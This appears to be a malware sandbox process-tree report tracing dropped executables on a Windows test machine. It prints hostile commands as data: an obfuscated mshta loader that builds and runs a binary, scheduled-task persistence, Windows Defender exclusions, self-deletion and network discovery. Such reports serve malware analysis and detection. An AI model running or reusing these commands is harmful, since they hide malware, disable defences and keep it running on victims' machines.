- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1828
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:968
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3644
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3512
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:4656
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5072
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6056
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\142D.exeC:\Users\Admin\AppData\Local\Temp\142D.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3688
-
C:\Users\Admin\AppData\Local\Temp\3E6B.exeC:\Users\Admin\AppData\Local\Temp\3E6B.exe1⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5804
-
C:\Users\Admin\AppData\Local\Temp\727C.exeC:\Users\Admin\AppData\Local\Temp\727C.exe1⤵
- Suspicious use of SetThreadContext
PID:5128 -
C:\Users\Admin\AppData\Local\Temp\727C.exeC:\Users\Admin\AppData\Local\Temp\727C.exe2⤵
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:1528 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\727C.exe"3⤵PID:5288
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
PID:5520
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\945D.exeC:\Users\Admin\AppData\Local\Temp\945D.exe1⤵PID:4408
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\C36D.dll1⤵PID:2232
-
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\C36D.dll2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
PID:5412 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe3⤵PID:2160
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn ddqdlcbnv /tr "regsvr32.exe -s \"C:\Users\Admin\AppData\Local\Temp\C36D.dll\"" /SC ONCE /Z /ST 10:46 /ET 10:584⤵
- Creates scheduled task(s)
PID:3196
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D725.exeC:\Users\Admin\AppData\Local\Temp\D725.exe1⤵
- Suspicious use of SetThreadContext
PID:5632 -
C:\Users\Admin\AppData\Local\Temp\D725.exeC:\Users\Admin\AppData\Local\Temp\D725.exe2⤵
- Adds Run key to start application
PID:5360 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:5616
-
-
C:\Users\Admin\AppData\Local\Temp\D725.exe"C:\Users\Admin\AppData\Local\Temp\D725.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Suspicious use of SetThreadContext
PID:5264 -
C:\Users\Admin\AppData\Local\Temp\D725.exe"C:\Users\Admin\AppData\Local\Temp\D725.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Modifies extensions of user files
PID:2372 -
C:\Users\Admin\AppData\Local\dacfdfbb-1f67-4b50-9a15-c70fdcf65521\build3.exe"C:\Users\Admin\AppData\Local\dacfdfbb-1f67-4b50-9a15-c70fdcf65521\build3.exe"5⤵
- Suspicious use of SetThreadContext
PID:1996 -
C:\Users\Admin\AppData\Local\dacfdfbb-1f67-4b50-9a15-c70fdcf65521\build3.exe"C:\Users\Admin\AppData\Local\dacfdfbb-1f67-4b50-9a15-c70fdcf65521\build3.exe"6⤵PID:5464
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
PID:4304
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10A4.exeC:\Users\Admin\AppData\Local\Temp\10A4.exe1⤵PID:4992
-
C:\Users\Admin\AppData\Local\Temp\new.exe"C:\Users\Admin\AppData\Local\Temp\new.exe" -update "10A4.exe"2⤵PID:5348
-
C:\Users\Admin\AppData\Local\Temp\10A4.exe"C:\Users\Admin\AppData\Local\Temp\10A4.exe" -updated3⤵
- Adds Run key to start application
PID:4792 -
C:\Users\Admin\AppData\Roaming\Absolute\module.exe"C:\Users\Admin\AppData\Roaming\Absolute\module.exe"4⤵PID:5044
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\new.exe"3⤵PID:5196
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30004⤵
- Runs ping.exe
PID:2904
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2084.exeC:\Users\Admin\AppData\Local\Temp\2084.exe1⤵PID:1368
-
C:\Users\Admin\AppData\Local\Temp\32E4.exeC:\Users\Admin\AppData\Local\Temp\32E4.exe1⤵
- Loads dropped DLL
- Checks processor information in registry
PID:4792 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 32E4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\32E4.exe" & del C:\ProgramData\*.dll & exit2⤵PID:6112
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 32E4.exe /f3⤵
- Kills process with taskkill
PID:6108
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:6100
-
-
-
C:\Users\Admin\AppData\Local\Temp\4F56.exeC:\Users\Admin\AppData\Local\Temp\4F56.exe1⤵PID:4132
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRipt: cLose( CReAtEOBJECT( "WsCrIPT.sHell" ).rUn ( "cmD.ExE /R TYPe ""C:\Users\Admin\AppData\Local\Temp\4F56.exe"" > ..\JKadlCLvM2SRA2.ExE &&staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw & IF """" =="""" for %q in (""C:\Users\Admin\AppData\Local\Temp\4F56.exe"") do taskkill -iM ""%~Nxq"" -f " , 0 , truE ))2⤵PID:5468
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\4F56.exe"> ..\JKadlCLvM2SRA2.ExE &&staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw& IF "" =="" for %q in ("C:\Users\Admin\AppData\Local\Temp\4F56.exe") do taskkill -iM "%~Nxq" -f3⤵PID:5404
-
C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw4⤵PID:1860
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRipt: cLose( CReAtEOBJECT( "WsCrIPT.sHell" ).rUn ( "cmD.ExE /R TYPe ""C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"" > ..\JKadlCLvM2SRA2.ExE &&staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw & IF ""/PvqsV6~7fsyUR14GhQkS4jjgPQTPw"" =="""" for %q in (""C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"") do taskkill -iM ""%~Nxq"" -f " , 0 , truE ))5⤵PID:740
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"> ..\JKadlCLvM2SRA2.ExE &&staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw& IF "/PvqsV6~7fsyUR14GhQkS4jjgPQTPw" =="" for %q in ("C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE") do taskkill -iM "%~Nxq" -f6⤵PID:5012
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCripT: ClOSe (creAteObJecT( "WscrIpT.sheLl" ). RUN ( "cmd /q /c ECho %tImE%4u> VDn3614.Q9 &ECho | SET /p = ""MZ"" > WSyZI.4 & coPY /b /y WSYZI.4 + 0CPM7.G + TY6DSS.SE + vDN3614.Q9 ..\UfTh.2~z& STaRt msiexec -y ..\UFTH.2~Z & deL /q * ",0 , tRUe ) )5⤵PID:5148
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c ECho %tImE%4u> VDn3614.Q9 &ECho | SET /p = "MZ" > WSyZI.4& coPY /b /y WSYZI.4+ 0CPM7.G+ TY6DSS.SE+ vDN3614.Q9 ..\UfTh.2~z& STaRt msiexec -y ..\UFTH.2~Z & deL /q *6⤵PID:3704
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECho "7⤵PID:5024
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>WSyZI.4"7⤵PID:5436
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -y ..\UFTH.2~Z7⤵
- Loads dropped DLL
PID:5760
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "4F56.exe" -f4⤵
- Kills process with taskkill
PID:3328
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\586F.exeC:\Users\Admin\AppData\Local\Temp\586F.exe1⤵PID:5752
-
\??\c:\windows\system32\regsvr32.exeregsvr32.exe -s "C:\Users\Admin\AppData\Local\Temp\C36D.dll"1⤵PID:2232
-
C:\Windows\SysWOW64\regsvr32.exe-s "C:\Users\Admin\AppData\Local\Temp\C36D.dll"2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
PID:5228 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4368 -
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /t REG_DWORD /v "C:\ProgramData\Microsoft\Omaeirficyei" /d "0"4⤵PID:956
-
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /t REG_DWORD /v "C:\Users\Admin\AppData\Roaming\Microsoft\Pumao" /d "0"4⤵PID:5568
-
-
C:\Windows\SysWOW64\whoami.exewhoami /all4⤵PID:6832
-
-
C:\Windows\SysWOW64\cmd.execmd /c set4⤵PID:1796
-
-
C:\Windows\SysWOW64\arp.exearp -a4⤵PID:6580
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all4⤵
- Gathers network information
PID:6188
-
-
C:\Windows\SysWOW64\net.exenet view /all4⤵
- Discovers systems in the same network
PID:6964
-
-
C:\Windows\SysWOW64\nslookup.exenslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.WORKGROUP4⤵PID:6104
-
-
C:\Windows\SysWOW64\net.exenet share4⤵PID:6544
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share5⤵PID:6596
-
-
-
C:\Windows\SysWOW64\route.exeroute print4⤵PID:6492
-
-
C:\Windows\SysWOW64\netstat.exenetstat -nao4⤵
- Gathers network information
PID:6912
-
-
C:\Windows\SysWOW64\net.exenet localgroup4⤵PID:6996
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup5⤵PID:7120
-
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe -s "C:\ProgramData\Microsoft\Omaeirficyei\ewdvnymudi.dll"4⤵
- Suspicious behavior: MapViewOfSection
PID:6868 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6520
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:3084 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:500
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"3⤵
- Creates scheduled task(s)
PID:3024
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:4212
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:5804 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:5780
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:5540 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:4372
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:5376 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:792
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:5488
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:4792 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:6072
-
-
\??\c:\windows\system\svchost.exec:\windows\system\svchost.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:6012
-
C:\Users\Admin\AppData\Roaming\ghdhvtsC:\Users\Admin\AppData\Roaming\ghdhvts1⤵
- Suspicious use of SetThreadContext
PID:400 -
C:\Users\Admin\AppData\Roaming\ghdhvtsC:\Users\Admin\AppData\Roaming\ghdhvts2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:224
-
-
C:\Users\Admin\AppData\Roaming\rvdhvtsC:\Users\Admin\AppData\Roaming\rvdhvts1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:904
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies registry class
PID:5672
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:1200 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:520
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6232
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:6392 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:6564
-
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:6608
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:4048
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:7076 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:5712
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:7112 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:7080
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies registry class
PID:6000
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:7084 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:7424
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:7200
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7540
-
\??\c:\windows\system32\regsvr32.exeregsvr32.exe -s "C:\Users\Admin\AppData\Local\Temp\C36D.dll"1⤵PID:7716
-
C:\Windows\SysWOW64\regsvr32.exe-s "C:\Users\Admin\AppData\Local\Temp\C36D.dll"2⤵PID:7732
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:7744 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:7780
-
-
C:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exeC:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exe --Task1⤵
- Suspicious use of SetThreadContext
PID:7996 -
C:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exeC:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exe --Task2⤵PID:8024
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8164
-
\??\c:\windows\system\svchost.exec:\windows\system\svchost.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:7480
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:6472 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:6012
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:7572 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:7956
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:7648
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:7392 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:7444
-
-
C:\Users\Admin\AppData\Roaming\ghdhvtsC:\Users\Admin\AppData\Roaming\ghdhvts1⤵
- Suspicious use of SetThreadContext
PID:7548 -
C:\Users\Admin\AppData\Roaming\ghdhvtsC:\Users\Admin\AppData\Roaming\ghdhvts2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4244
-
-
C:\Users\Admin\AppData\Roaming\rvdhvtsC:\Users\Admin\AppData\Roaming\rvdhvts1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7608
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:6624 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:8168
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:7188
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:4020 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:4384
-
-
C:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exeC:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exe --Task1⤵
- Suspicious use of SetThreadContext
PID:4080 -
C:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exeC:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5\D725.exe --Task2⤵PID:3212
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:7940 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:7436
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:7624
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:6740 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:2124
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:7688 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:2220
-
-
\??\c:\windows\system\svchost.exec:\windows\system\svchost.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:7180
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:7328 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:5904
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
PID:2300 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:7880
-
-
